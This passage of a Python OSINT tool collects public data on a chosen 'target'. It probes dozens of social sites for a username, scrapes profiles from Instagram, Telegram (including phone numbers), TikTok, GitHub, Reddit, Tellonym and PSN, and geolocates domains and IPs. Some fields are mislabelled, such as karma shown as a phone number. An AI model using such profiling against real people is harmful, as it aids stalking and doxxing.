{Blue}")) 246 | engine = Brave() 247 | results = engine.search(sql, pages=number_of_pages) 248 | seen = set() 249 | for data in results.__dict__['_results']: 250 | text = data['text'] 251 | if text not in seen: 252 | link = data['link'] 253 | title = data['title'] 254 | self.add_info(link, title, text, "Google") 255 | seen.add(text) 256 | print(f"{White}[{Green}✓{White}] Done Search in Brave") 257 | 258 | def save(self): 259 | with open(f"Dorks results.txt", "wt", encoding="utf-8") as F: F.write(self.output) 260 | F.close() 261 | print(f"\n{White}[{Green}✓{White}] The results has been saved in {Blue}{ os.getcwd()}\Dorks results.txt{White}") 262 | dorks() 263 | elif selection == "2" or selection == "02" or selection == "Search For Username" or selection == "SEARCH FOR USERNAME" or selection == "search for username": 264 | try: 265 | def search_social_media(username): 266 | websites = { 267 | "FaceBook": f"https://www.facebook.com/public/{username}/", 268 | "Instagram": f"https://instagram.com/{username}/", 269 | "YouTube": f"https://www.youtube.com/@{username}/", 270 | "TikTok": f"https://www.tiktok.com/@{username}/", 271 | "SnapChat": f"https://www.snapchat.com/add/{username}/", 272 | "Telegram": f"https://t.me/{username}/", 273 | "Spotify": f"https://open.spotify.com/user/{username}/", 274 | "X": f"https://twitter.com/{username}/", 275 | "Pinterest": f"https://in.pinterest.com/{username}/", 276 | "Reddit": f"https://www.reddit.com/user/{username}/", 277 | "Tumblr": f"https://tumblr.com/{username}/", 278 | "Google+": f"https://plus.google.com/s/{username}/top/", 279 | "Weibo": f"https://weibo.com/u/{username}/", 280 | "Badoo": f"https://www.badoo.com/en/{username}/", 281 | "Behance": f"https://www.behance.net/{username}/", 282 | "Dribbble": f"https://dribbble.com/{username}/", 283 | "Kuaishou": f"https://www.kuaishou.com/profile/{username}/", 284 | "YY": f"https://www.yy.com/u/{username}/", 285 | "Quora": f"https://www.quora.com/profile/{username}/", 286 | "Tieba Baidu": f"https://tieba.baidu.com/f?kw={username}/", 287 | "Imgur": f"https://imgur.com/user/{username}/", 288 | "PayPal": f"https://www.paypal.com/paypalme/{username}/", 289 | "Vimeo": f"https://vimeo.com/{username}/", 290 | "Discord": f"https://discord.gg/{username}/", 291 | "Likee": f"https://l.likee.video/p/{username}/", 292 | "PicsArt": f"https://picsart.com/{username}/", 293 | "Twitch": f"https://www.twitch.tv/{username}/", 294 | "Linkedin": f"https://www.linkedin.com/in/{username}/", 295 | "Threads": f"https://www.threads.net/@{username}/", 296 | "Medium": f"https://medium.com/@{username}/", 297 | "Stack Exchange": f"https://academia.stackexchange.com/users/{username}/", 298 | "Wattpad": f"https://www.wattpad.com/user/{username}/", 299 | "SoundCloud": f"https://soundcloud.com/{username}/", 300 | "Deviantart": f"https://www.deviantart.com/{username}/", 301 | "YuboLive": f"https://www.deviantart.com/{username}/", 302 | "Tinder": f"https://tinder.com/app/profile/{username}/", 303 | "Wordpress": f"https://wordpress.com/{username}/", 304 | "NextDoor": f"https://nextdoor.com/profile/{username}/", 305 | "Triller": f"https://triller.co/@{username}/", 306 | "Flickr": f"https://www.flickr.com/people/{username}/", 307 | "Foursquare": f"https://foursquare.com/user/{username}/", 308 | "Steam": f"https://steamcommunity.com/id/{username}/", 309 | "Roblox": f"https://www.roblox.com/user.aspx?username={username}/", 310 | "Fotolog": f"https://fotolog.com/{username}/", 311 | "Gaiaonline": f"https://www.gaiaonline.com/profiles/{username}/", 312 | "Myspace": f"https://myspace.com/{username}/", 313 | "Replit": f"https://replit.com/@{username}/", 314 | "Tagged": f"https://www.tagged.com/{username}/", 315 | "Mixi": f"https://mixi.jp/view_community.pl?id= {username}/", 316 | "Crunchyroll": f"https://www.crunchyroll.com/{username}/", 317 | "Meetup": f"https://www.meetup.com/{username}/", 318 | "Tellonym": f"https://tellonym.me/{username}/", 319 | "Pastebin": f"https://pastebin.com/u/{username}/", 320 | "Github": f"https://github.com/{username}/", 321 | "Gitlab": f"https://gitlab.com/{username}/", 322 | "Wikipedia": f"https://www.wikipedia.org/wiki/User:{username}/", 323 | "Udemy": f"https://www.udemy.com/user/{username}/", 324 | "Canva": f"https://www.canva.com/{username}/", 325 | "Payhip": f"https://payhip.com/{username}", 326 | "Portswigger": f"https://portswigger.net/users//{username}", 327 | "DokanTip": f"https://tip.dokan.sa/{username}/", 328 | "Harmash": f"https://harmash.com/users/{username}/", 329 | "EXPO ReactNative": f"https://expo.dev/accounts/{username}" } 330 | 331 | found_sites = [] 332 | for site, url in websites.items(): 333 | response = requests.get(url) 334 | if response.status_code == 200: 335 | time.sleep(0.5) 336 | print(f"{White}[{Green}✓{White}] {site} : Found - {Yellow}{url}") 337 | found_sites.append(f"{site} : {url}") 338 | else: print(f"{White}[{Red}X{White}] {site} Not Found") 339 | 340 | print(f"\n{White}[{Green}✓{White}] Done search in 62 social media!") 341 | 342 | return found_sites 343 | 344 | def save_results(results): 345 | with open(f"search_social_media_results.txt", "wt") as F: 346 | for i, result in enumerate(results, start=1): F.write(f"{i}- {result}\n") 347 | F.close() 348 | print(f"{White}[{Green}✓{White}] The results has been saved in {Blue}{ os.getcwd()}\search social media results.txt{White}") 349 | 350 | username = input(f"{White}[{Blue}+{White}] Enter username/nickname target : {Blue}@") 351 | print(f"{White}Search for {Blue}@{username}{White} in") 352 | time.sleep(1) 353 | 354 | results = search_social_media(username) 355 | 356 | save_to_file = input(f"\n{White}Do you want to save it to a file? ({Blue}Y{White}/{Blue}N{White}) {Blue}") 357 | if save_to_file == "Y" or save_to_file == "y" or save_to_file == "Yes" or save_to_file == "yes" or save_to_file == "YES": save_results(results) 358 | elif save_to_file == "N" or save_to_file == "n" or save_to_file == "No" or save_to_file == "no" or save_to_file == "No": exit() 359 | else: print(f"{Red}Please choose a correct option!{White}") 360 | except BaseException as msg: print(f"{Red}E : {msg}") 361 | elif selection == "3" or selection == "03" or selection == "Usernames OSINT" or selection == "usernames OSINT" or selection == "USERNAMES OSINT" or selection == "usernames osint": 362 | submenu1() 363 | user_input = input(f"Choose : {Blue}") 364 | 365 | if user_input == "1" or user_input == "01" or user_input == "Instagram" or user_input == "INSTAGRAM" or user_input == "intagram" or user_input == "Insta" or user_input == "INSTA" or user_input == "insta": 366 | x = Instaloader() 367 | 368 | username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 369 | 370 | print(f"{White}Getting info...") 371 | time.sleep(3) 372 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 373 | time.sleep(1) 374 | 375 | f = instaloader.Profile.from_username(x.context, username) 376 | 377 | try: 378 | print(f""" 379 | ┏━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ 380 | ┃ Info ┃ Acc ┃ 381 | ┡━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ 382 | │ ID │ {f.userid} 383 | │ Is business acc? │ {"Yes" if f.is_business_account else "No"} 384 | │ Business category name │ {f.business_category_name} 385 | │ Is verified acc? │ {"Yes" if f.is_verified else "No"} 386 | │ Is private acc? │ {"Yes" if f.is_private else "No"} 387 | │ Username │ @{f.username} 388 | │ Nickname │ {f.full_name} 389 | │ Avater │ {f.profile_pic_url} 390 | │ Followers │ {f.followers} 391 | │ Following │ {f.followees} 392 | │ Followed by viewer │ {f.followed_by_viewer} 393 | │ Follows by viewer │ {f.follows_viewer} 394 | │ Has blocked viewer │ {f.has_blocked_viewer} 395 | │ Posts │ {f.mediacount} 396 | │ IGTV videos │ {f.igtvcount} 397 | │ Has public stories? │ {f.has_public_story} 398 | │ Has viewable stories? │ {f.has_viewable_story} 399 | │ Has highlight? │ {f.has_highlight_reels} 400 | │ Bio │ {f.biography} 401 | │ Bio link │ {f.external_url} 402 | │ Has requested viewer? │ {f.has_requested_viewer} 403 | │ Has requested by viewer? │ {f.requested_by_viewer} 404 | └──────────────────────────┴──────────────────────────────────────────────────────────────────────────────┘""") 405 | except BaseException as msg: print(f"{Red}E : {msg}") 406 | 407 | elif user_input == "2" or user_input == "02" or user_input == "Telegram" or user_input == "TELEGRAM" or user_input == "telegram" or user_input == "Tele" or user_input == "TELE" or user_input == "tele": 408 | api_id = input(f"{White}[{Blue}+{White}] - Enter your API ID : {Blue}") 409 | api_hash = input(f"{White}[{Blue}+{White}] - Enter your API hash : {Blue}") 410 | 411 | client = TelegramClient("session_name", api_id, api_hash) 412 | 413 | async def main(): 414 | await client.start() 415 | username = input(f"{White}[{Blue}+{White}] - Enter username/phonenumber target : {Blue}@") 416 | 417 | print(f"{White}Getting info...") 418 | time.sleep(3) 419 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 420 | time.sleep(1) 421 | 422 | try: 423 | username = await client.get_entity(username) 424 | 425 | table = Table(title="") 426 | table.add_column("Info", no_wrap=True) 427 | table.add_column("Acc") 428 | table.add_row("ID", str(username.id)) 429 | table.add_row("Username", str("@"+username.username)) 430 | table.add_row("Fristname", str(username.first_name)) 431 | table.add_row("Lastname", str(username.last_name)) 432 | table.add_row("Phonenumber", str(username.phone)) 433 | Console().print(table, justify="left") 434 | except BaseException as mag: print(f"{Red}E : {mag}") 435 | 436 | await client.disconnect() 437 | 438 | if __name__ == '__main__': 439 | import asyncio 440 | asyncio.run(main()) 441 | elif user_input == "3" or user_input == "03" or user_input == "TikTok" or user_input == "TIKTOK" or user_input == "tiktok" or user_input == "Tik" or user_input == "TIK" or user_input == "tik": 442 | class Tik: 443 | def __init__(self, username: str): 444 | self.username = username 445 | self.json_data = None 446 | if "@" in self.username: self.username = self.username.replace("@", "") 447 | self.admin() 448 | 449 | def admin(self): 450 | self.send_request() 451 | self.output() 452 | 453 | def send_request(self): 454 | headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0"} 455 | r = requests.get(f"https://www.tiktok.com/@{self.username}", headers=headers) 456 | 457 | try: 458 | soup = BeautifulSoup(r.text, 'html.parser') 459 | script_tag = soup.find('script', {'id': '__UNIVERSAL_DATA_FOR_REHYDRATION__'}) 460 | script_text = script_tag.text.strip() 461 | self.json_data = json.loads(script_text)["__DEFAULT_SCOPE__"]["webapp.user-detail"]["userInfo"] 462 | except: print(f"{Red}E : Username not found!{White}") 463 | 464 | def get_user_id(self): 465 | try: return str(self.json_data["user"]["id"]) 466 | except IndexError: return "Unknown" 467 | 468 | def get_name(self): 469 | try: return self.json_data["user"]["nickname"] 470 | except IndexError: return "Unknown" 471 | 472 | def is_verified(self): 473 | try: 474 | check = self.json_data["user"]["verified"] 475 | if check == "false" or check is False: return "No" 476 | else: return "Yes" 477 | except: return "Unknown" 478 | 479 | def secUid(self): 480 | try: return self.json_data["user"]["secUid"] 481 | except: return "Unknown" 482 | 483 | def is_private(self): 484 | try: 485 | check = self.json_data["user"]["privateAccount"] 486 | if check == "true" or check is True: return "Yes" 487 | else: return "No" 488 | except: return "Unknown" 489 | 490 | def followers(self): 491 | try: return self.json_data["stats"]["followerCount"] 492 | except: return "Unknown" 493 | 494 | def following(self): 495 | try: return self.json_data["stats"]["followingCount"] 496 | except: return "Unknown" 497 | 498 | def user_create_time(self): 499 | try: 500 | url_id = int(self.get_user_id()) 501 | binary = "{0:b}".format(url_id) 502 | i = 0 503 | bits = "" 504 | while i < 31: 505 | bits += binary[i] 506 | i += 1 507 | timestamp = int(bits, 2) 508 | dt_object = datetime.fromtimestamp(timestamp) 509 | return dt_object 510 | except: return "Unknown" 511 | 512 | def last_change_name(self): 513 | try: 514 | time = self.json_data["user"]["nickNameModifyTime"] 515 | check = datetime.fromtimestamp(int(time)) 516 | return check 517 | except: return "Unknown" 518 | 519 | def account_region(self): 520 | try: return self.json_data["user"]["region"] 521 | except: return "Unknown" 522 | 523 | def video_count(self): 524 | try: return self.json_data["stats"]["videoCount"] 525 | except: return "Unknown" 526 | 527 | def open_favorite(self): 528 | try: 529 | check = self.json_data["user"]["openFavorite"] 530 | if check is False or check == "false": return "No" 531 | return "Yes" 532 | except: return "Unknown" 533 | 534 | def see_following(self): 535 | try: 536 | check = str(self.json_data["user"]["followingVisibility"]) 537 | if check == "1": return "Yes" 538 | return "No" 539 | except: return "Unknown" 540 | 541 | def language(self): 542 | try: return str(self.json_data["user"]["language"]) 543 | except: return "Unknown" 544 | 545 | def heart_count(self): 546 | try: return str(self.json_data["stats"]["heart"]) 547 | except: return "Unknown" 548 | 549 | def output(self): 550 | print(f"{White}[ Get info for {Blue}@{self.username} {Green}✓{White} ]\n") 551 | time.sleep(1) 552 | 553 | table = Table(title="") 554 | table.add_column("Info", no_wrap=True) 555 | table.add_column("Acc") 556 | table.add_row("ID", str(self.get_user_id())) 557 | table.add_row("SecUid", str(self.secUid())) 558 | table.add_row("is verified?", str(self.is_verified())) 559 | table.add_row("is private?", str(self.is_private())) 560 | table.add_row("Username", str("@"+self.username)) 561 | table.add_row("Nickname", str(self.get_name())) 562 | table.add_row("Location", str(self.account_region())) 563 | table.add_row("Followers", str(self.followers())) 564 | table.add_row("Following", str(self.following())) 565 | table.add_row("Can see following list?", str(self.see_following())) 566 | table.add_row("Videos", str(self.video_count())) 567 | table.add_row("Likes", str(self.heart_count())) 568 | table.add_row("Open Fav?", str(self.open_favorite())) 569 | table.add_row("Language", str(self.language())) 570 | table.add_row("Create", str(self.user_create_time())) 571 | table.add_row("Last change nickname", str(self.last_change_name())) 572 | Console().print(table, justify="left") 573 | 574 | username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 575 | 576 | print(f"{White}Getting info...") 577 | time.sleep(3) 578 | Tik(username) 579 | elif user_input == "4" or user_input == "04" or user_input == "GitHub" or user_input == "GITHUB" or user_input == "github": 580 | class Github: 581 | def __init__(self): 582 | self.Start() 583 | 584 | def Start(self): 585 | self.username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 586 | 587 | print(f"{White}Getting info...") 588 | time.sleep(3) 589 | print(f"{White}[ Get info for {Blue}@{self.username} {Green}✓{White} ]\n") 590 | time.sleep(1) 591 | 592 | try: 593 | self.Get = requests.get('https://api.github.com/users/%s'%(self.username)) 594 | self.Req = json.loads(self.Get.text) 595 | table = Table(title="") 596 | table.add_column("Info", no_wrap=True) 597 | table.add_column("Acc") 598 | table.add_row("ID", str(self.Req['node_id'])) 599 | table.add_row("Type", str(self.Req['type'])) 600 | table.add_row("Username", str("@"+self.Req['login'])) 601 | table.add_row("Acc link", str(self.Req['html_url'])) 602 | table.add_row("Nickname", str(self.Req['name'])) 603 | table.add_row("Company", str(self.Req['company'])) 604 | table.add_row("Bio", str(self.Req['bio'])) 605 | table.add_row("Public email", str(self.Req['email'] if self.Req['email'] else "No")) 606 | table.add_row("Bio link", str(self.Req['blog'])) 607 | table.add_row("X link", str(self.Req['twitter_username'] if self.Req['twitter_username'] else "No")) 608 | table.add_row("Avatar", str(self.Req['avatar_url'])) 609 | table.add_row("Location", str(self.Req['location'])) 610 | table.add_row("Followers", str(self.Req['followers'])) 611 | table.add_row("Following", str(self.Req['following'])) 612 | table.add_row("Public repos", str(self.Req['public_repos'])) 613 | table.add_row("Public gists", str(self.Req['public_gists'])) 614 | table.add_row("Create", str(self.Req['created_at'])) 615 | table.add_row("Hireable", str("Yes" if self.Req['hireable'] else "No")) 616 | table.add_row("Last updated", str(self.Req['updated_at'])) 617 | Console().print(table, justify="left") 618 | except BaseException as mag: print(f"{Red}E : {mag}") 619 | if __name__=='__main__': Github() 620 | elif user_input == "5" or user_input == "05" or user_input == "Reddit" or user_input == "REDDIT" or user_input == "reddit": 621 | client_id = input(f"{White}[{Blue}+{White}] - Enter your client ID : {Blue}") 622 | client_secret = input(f"{White}[{Blue}+{White}] - Enter your client secert : {Blue}") 623 | user_agent = input(f"{White}[{Blue}+{White}] - Enter your useragent : {Blue}@") 624 | username = input(f"{White}[{Blue}+{White}] - Enter username target : {Blue}@") 625 | 626 | print(f"{White}Getting info...") 627 | time.sleep(3) 628 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 629 | time.sleep(1) 630 | 631 | reddit = praw.Reddit(client_id=client_id, client_secret=client_secret, user_agent=user_agent) 632 | 633 | try: 634 | username = reddit.redditor(username) 635 | 636 | table = Table(title="") 637 | table.add_column("Info", no_wrap=True) 638 | table.add_column("Acc") 639 | table.add_row("ID", str(username.id)) 640 | table.add_row("Username", str("@"+username.name)) 641 | table.add_row("Nickname", str(username.fullname)) 642 | table.add_row("Avatar", str(username.icon_img)) 643 | table.add_row("Bio", str(username.subreddit['description'])) 644 | table.add_row("Bio link", str(username.subreddit['public_description'])) 645 | table.add_row("Public email", str("Yes" if username.has_verified_email else "No")) 646 | table.add_row("Public phonenumber", str(username.comment_karma + username.link_karma)) 647 | table.add_row("Create", str(username.created_utc)) 648 | Console().print(table, justify="left") 649 | except BaseException as mag: print(f"{Red}E : {mag}") 650 | elif user_input == "6" or user_input == "06" or user_input == "Tellonym" or user_input == "TELLONYM" or user_input == "tellonym" or user_input == "Tell" or user_input == "TELL" or user_input == "tell": 651 | class Tell: 652 | def __init__(self, username): 653 | self.username = username 654 | self.driver = self.driver() 655 | self.get_info() 656 | 657 | @staticmethod 658 | def driver(): 659 | chrome_options = Options() 660 | chrome_options.add_argument('disable-infobars') 661 | chrome_options.add_argument("--disable-logging") 662 | chrome_options.add_argument('--log-level=3') 663 | chrome_options.add_argument("--headless") 664 | chrome_options.add_argument("--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36") 665 | return webdriver.Chrome(options=chrome_options) 666 | 667 | def get_info(self): 668 | try: 669 | self.driver.get(f"https://api.tellonym.me/profiles/name/{self.username}?previousRouteName=ScreenProfileSharing&isClickedInSearch=true&sourceElement=Search%20Result&adExpId=91&limit=16") 670 | self.driver.implicitly_wait(5) 671 | response = self.driver.find_element(By.TAG_NAME, "pre") 672 | 673 | if "The entry you were looking for could not be found." in response.text: 674 | input(f"{Red}Username not found!{White}") 675 | exit() 676 | elif "This account is banned." in response.text: 677 | input(f"{Red}acc is banned!{White}") 678 | exit() 679 | else: 680 | json_data = json.loads(response.text) 681 | id = json_data.get("id", "Unknown") 682 | username = json_data.get("username", "Unknown") 683 | name = json_data.get("displayName", "Unknown") 684 | bio = json_data.get("aboutMe", "Unknown") 685 | avatar = f"https://userimg.tellonym.me/lg-v2/{json_data['avatarFileName']}" 686 | countryCode = json_data.get("countryCode", "Unknown") 687 | followers = json_data.get("followerCount", "Unknown") 688 | anonymousFollowerCount = json_data.get("anonymousFollowerCount", "Unknown") 689 | RealFollowers = followers - anonymousFollowerCount or "0" 690 | following = json_data.get("followingCount", "Unknown") 691 | tell = json_data.get("tellCount", "Unknown") 692 | answer = json_data.get("answerCount", "Unknown") 693 | likes = json_data.get("likesCount", "Unknown") 694 | is_Verified = json_data.get("isVerified", "Unknown") 695 | is_Able_to_comment = json_data.get("isAbleToComment", "Unknown") 696 | is_Active = json_data.get("isActive", "Unknown") 697 | 698 | table = Table(title="\n") 699 | table.add_column("Info", no_wrap=True) 700 | table.add_column("Acc") 701 | table.add_row("ID", str(id)) 702 | table.add_row("Username", str("@"+username)) 703 | table.add_row("Name", str(name)) 704 | table.add_row("Bio", str(bio)) 705 | table.add_row("Avatar", str(avatar)) 706 | table.add_row("Country", str(countryCode)) 707 | table.add_row("Followers", str(followers)) 708 | table.add_row("Real Followers", str(RealFollowers)) 709 | table.add_row("Anonymous Followers", str(anonymousFollowerCount)) 710 | table.add_row("Following", str(following)) 711 | table.add_row("Tells", str(tell)) 712 | table.add_row("Answers", str(answer)) 713 | table.add_row("Likes", str(likes)) 714 | table.add_row("is Verified acc?", "Yes" if is_Verified else "No") 715 | table.add_row("is Able to comment?", "Yes" if is_Able_to_comment else "No") 716 | table.add_row("is Active now?", "Yes" if is_Active else "No") 717 | Console().print(table, justify="left") 718 | except BaseException as mag: print(f"{Red}E : {mag}") 719 | 720 | username = input(f"{White}[{Blue}+{White}] - Enter username target : {Blue}@") 721 | print(f"{White}Getting info...") 722 | time.sleep(3) 723 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 724 | time.sleep(1) 725 | Tell(username) 726 | elif user_input == "7" or user_input == "07" or user_input == "Sony" or user_input == "SONY" or user_input == "sony": 727 | class PSN(): 728 | def __init__(self): 729 | self.key = input(f"{White}[{Blue}+{White}] Enter the npsso : {Blue}") 730 | self.r = None 731 | self.admin() 732 | 733 | def admin(self): 734 | print(f"{White}Check npsso...\n") 735 | time.sleep(1.5) 736 | 737 | self.check_from_code() 738 | 739 | if self.r: 740 | submenu5() 741 | user_input_submenu5 = input(f"Choose : {Blue}") 742 | if user_input_submenu5 == "1" or user_input_submenu5 == "01" or user_input_submenu5 == "My acc info" or user_input_submenu5 == "MY ACC INFO" or user_input_submenu5 == "my acc info": self.my_acc_info() 743 | elif user_input_submenu5 == "2" or user_input_submenu5 == "02" or user_input_submenu5 == "Osint for user by username" or user_input_submenu5 == "OSINT FOR USER BY USERNAME" or user_input_submenu5 == "osint for user by username": self.osint_username() 744 | elif user_input_submenu5 == "3" or user_input_submenu5 == "03" or user_input_submenu5 == "Osint for user by userID" or user_input_submenu5 == "OSINT FOR USER BY USERID" or user_input_submenu5 == "osint for user by userid": self.osint_userid() 745 | elif user_input_submenu5 == "99" or user_input_submenu5 == "Back" or user_input_submenu5 == "BACK" or user_input_submenu5 == "back": main_menu() 746 | else: 747 | print(f"{Red}Please choose a correct option!") 748 | submeun5() 749 | else: print(f"{Red}Please enter a correct npsso!") 750 | 751 | def my_acc_info(self): 752 | print(f"{White}Getting info...") 753 | time.sleep(3) 754 | print(f"{White}[ Get info for {Blue}{self.key} {Green}✓{White} ]") 755 | time.sleep(1) 756 | 757 | info = self.r.me() 758 | table = Table(title="\n") 759 | table.add_column("Info", no_wrap=True) 760 | table.add_column("Acc") 761 | table.add_row("UserID", info.account_id) 762 | table.add_row("Username", f"@{info.online_id}") 763 | info_profile = json.dumps(info.get_profile_legacy()) 764 | info_profile = json.loads(info_profile) 765 | table.add_row("Nickname", f"{info_profile['profile']['personalDetail']['firstName']} {info_profile['profile']['personalDetail']['lastName']}") 766 | device_info = json.dumps(info.get_account_devices()) 767 | device_info = json.loads(device_info) 768 | table.add_row("Device", "PlayStation") 769 | i = 0 770 | while True: 771 | try: 772 | table.add_row("Device ID", device_info[i]['deviceId']) 773 | table.add_row("Device Type", device_info[i]['deviceType'] if device_info[i]['deviceType'] else "Not Found") 774 | table.add_row("Activation Date", device_info[i]['activationDate']) 775 | i += 1 776 | except: break 777 | table.add_row("Avatar", info_profile['profile']['avatarUrls'][0]['avatarUrl'] if info_profile['profile']['avatarUrls'][0]['avatarUrl'] else "Not Found") 778 | table.add_row("Have Plus?", str(info_profile['profile']['plus'])) 779 | table.add_row("Trophys", f"{info_profile['profile']['trophySummary']['earnedTrophies']['bronze']} Bronze | {info_profile['profile']['trophySummary']['earnedTrophies']['silver']} Silver | {info_profile['profile']['trophySummary']['earnedTrophies']['gold']} Gold | {info_profile['profile']['trophySummary']['earnedTrophies']['platinum']} Platinum") 780 | Console().print(table, justify="left") 781 | frinds_list = info.friends_list() 782 | print("Friends List") 783 | for accounts in frinds_list: 784 | print(f" User : @{accounts.online_id}") 785 | info_b = info.blocked_list() 786 | print("Blocked List") 787 | for users in info_b: 788 | print(f" User : @{users.online_id}") 789 | 790 | def osint_username(self): 791 | username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 792 | 793 | print(f"{White}Getting info...") 794 | time.sleep(3) 795 | print(f"{White}[ Get info for {Blue}{username} {Green}✓{White} ]") 796 | time.sleep(1) 797 | 798 | try: 799 | info = self.r.user(online_id=username) 800 | table = Table(title="\n") 801 | table.add_column("Info", no_wrap=True) 802 | table.add_column("Acc") 803 | profile_info = info.profile() 804 | table.add_row("UserID", info.account_id) 805 | table.add_row("Username", f"@{profile_info['onlineId']}") 806 | table.add_row("Nickname", f"{profile_info['personalDetail']['firstName']} {profile_info['personalDetail']['lastName']}") 807 | table.add_row("Avatar", profile_info['personalDetail']['profilePictures'][0]['url']) 808 | table.add_row("Bio", profile_info['personalDetail']['profilePictures'][0]['url']) 809 | table.add_row("Have Plas?", str(profile_info['isPlus'])) 810 | Console().print(table, justify="left") 811 | except BaseException as mag: print(f"{Red}E : {mag}") 812 | 813 | def osint_userid(self): 814 | userid = input(f"{White}[{Blue}+{White}] Enter userid target : {Blue}") 815 | 816 | print(f"{White}Getting info...") 817 | time.sleep(3) 818 | print(f"{White}[ Get info for {Blue}{userid} {Green}✓{White} ]") 819 | time.sleep(1) 820 | 821 | try: 822 | info = self.r.user(account_id=userid) 823 | table = Table(title="\n") 824 | table.add_column("Info", no_wrap=True) 825 | table.add_column("Acc") 826 | profile_info = info.profile() 827 | table.add_row("UserID", info.account_id) 828 | table.add_row("Username", f"@{profile_info['onlineId']}") 829 | table.add_row("Nickname", f"{profile_info['personalDetail']['firstName']} {profile_info['personalDetail']['lastName']}") 830 | table.add_row("Avatar", profile_info['personalDetail']['profilePictures'][0]['url']) 831 | table.add_row("Bio", profile_info['personalDetail']['profilePictures'][0]['url']) 832 | table.add_row("Have Plas?", str(profile_info['isPlus'])) 833 | Console().print(table, justify="left") 834 | except BaseException as mag: print(f"{Red}E : {mag}") 835 | 836 | def setup(self): 837 | self.r = PSNAWP(self.key) 838 | 839 | def check_from_code(self): 840 | try: 841 | check = PSNAWP(self.key) 842 | self.setup() 843 | except: print(f"{Red}E : The npsso not working!") 844 | PSN() 845 | elif user_input == "99" or user_input == "Back" or user_input == "BACK": main_menu() 846 | else: print(f"{Red}Please choose a correct option!") 847 | elif selection == "4" or selection == "04" or selection == "Domains OSINT" or selection == "DOMAINS OSINT" or selection == "domains osint": 848 | domain = input(f"{White}[{Blue}+{White}] - Enter the domain or IP : {Blue}") 849 | 850 | print(f"{White}Getting info...") 851 | time.sleep(3) 852 | print(f"[ Get info for {Blue}{domain} {Green}✓{White} ]\n") 853 | time.sleep(1) 854 | 855 | def domain_info(): 856 | url = f"https://demo.ip-api.com/json/{domain}?fields=66842623&lang=en" 857 | headers = { 'Accept': '*/*', 858 | 'Accept-Encoding': 'gzip, deflate, br', 859 | 'Accept-Language': 'en-US,en;q=0.9', 860 | 'Connection': 'keep-alive', 861 | 'Host': 'demo.ip-api.com', 862 | 'Origin': 'https://ip-api.com', 863 | 'Referer': 'https://ip-api.com/', 864 | 'sec-ch-ua': '".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"', 865 | 'sec-ch-ua-mobile': '?0', 866 | 'sec-ch-ua-platform': "Windows", 867 | 'Sec-Fetch-Dest': 'empty', 868 | 'Sec-Fetch-Mode': 'cors', 869 | 'Sec-Fetch-Site': 'same-site', 870 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36' } 871 | req1 = requests.post(url, headers=headers) 872 | req2 = requests.get(f'https://ipapi.co/{domain}/json/') 873 | 874 | table = Table(title="") 875 | table.add_column("Info", no_wrap=True) 876 | table.add_column("Domain") 877 | try: 878 | response = requests.get(f"https://{domain}/") 879 | table.add_row("URL", str(response.url)) 880 | except requests.exceptions.SSLError: table.add_row("URL", str(socket.gethostbyaddr(domain))) 881 | try: 882 | ip = socket.gethostbyname(domain) 883 | table.add_row("IP", str(ip)) 884 | hexhost = socket.inet_aton(domain) 885 | table.add_row("Binary Host", str(hexhost)) 886 | table.add_row("Hex Host", str(hexlify(hexhost))) 887 | except OSError: 888 | hexhost = socket.inet_aton(ip) 889 | table.add_row("Binary Host", str(hexhost)) 890 | table.add_row("Hex Host", str(hexlify(hexhost))) 891 | try: table.add_row("Version", str(req2.json()['version'])) 892 | except KeyError: None 893 | table.add_row("ISP", str(req1.json()['isp'])) 894 | table.add_row("FQDN", str(socket.getfqdn(domain))) 895 | try: table.add_row("Asn", str(req2.json()['asn'])) 896 | except KeyError: None 897 | table.add_row("Status", str(req1.json()['status'])) 898 | table.add_row("Continent", str(req1.json()['continent'])) 899 | table.add_row("ContinentCode", str(req1.json()['continentCode'])) 900 | table.add_row("Country", str(req1.json()['country'])) 901 | table.add_row("CountryCode", str(req1.json()['countryCode'])) 902 | table.add_row("Region", str(req1.json()['region'])) 903 | table.add_row("RegionName", str(req1.json()['regionName'])) 904 | table.add_row("City", str(req1.json()['city'])) 905 | table.add_row("District", str(req1.json()['district'])) 906 | table.add_row("Zip", str(req1.json()['zip'])) 907 | table.add_row("TimeZone", str(req1.json()['timezone'])) 908 | table.add_row("Currency", str(req1.json()['currency'])) 909 | table.add_row("Lat", str(req1.json()['lat'])) 910 | table.add_row("Lon", str(req1.json()['lon'])) 911 | table.add_row("Offset", str(req1.json()['offset'])) 912 | table.add_row("Mobile", str("Yes" if req1.json()['mobile'] is True else "No")) 913 | table.add_row("Status", str("Yes" if req1.json()['proxy'] is True else "No")) 914 | table.add_row("Hosting", str("Yes" if req1.json()['hosting'] is True else "No")) 915 | Console().print(table, justify="left") 916 | domain_info() 917 | elif selection == "5" or selection == "05" or selection == "IP's OSINT" or selection == "IP'S OSINT" or selection == "ip's osint": 918 | ip_osint_selections = input(f"""{White}[{Blue}01{White}] - Target 919 | [{Blue}02{White}] - Your device 920 | 921 | [{Blue}99{White}] - Back 922 | Choose : {Blue}""") 923 | if ip_osint_selections == "1" or ip_osint_selections == "01" or ip_osint_selections == "Target" or ip_osint_selections == "TARGET" or ip_osint_selections == "target": 